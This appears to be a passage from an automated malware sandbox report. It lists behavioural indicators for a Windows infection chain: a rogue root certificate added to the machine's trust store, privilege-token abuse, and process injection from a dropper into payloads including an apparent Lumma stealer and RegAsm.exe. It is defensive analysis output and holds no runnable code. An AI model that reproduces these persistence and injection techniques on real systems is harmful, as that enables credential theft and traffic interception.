Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
N/A N/A C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4748 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4748 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4748 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1152 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1152 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1152 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1152 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\7ec52fcc46.exe
PID 1152 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\7ec52fcc46.exe
PID 1152 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\7ec52fcc46.exe
PID 3572 wrote to memory of 4028 N/A C:\Users\Admin\1000004002\7ec52fcc46.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 3572 wrote to memory of 4028 N/A C:\Users\Admin\1000004002\7ec52fcc46.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 3572 wrote to memory of 4028 N/A C:\Users\Admin\1000004002\7ec52fcc46.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4028 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4028 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4028 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 3716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3716 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4700 wrote to memory of 4692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4700 wrote to memory of 4692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4700 wrote to memory of 3016 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4700 wrote to memory of 3016 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4700 wrote to memory of 3016 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 1152 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe
PID 1152 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe
PID 1152 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe
PID 4028 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4028 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4028 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4028 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4028 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4028 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1240 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1240 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4028 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 4028 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 4028 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
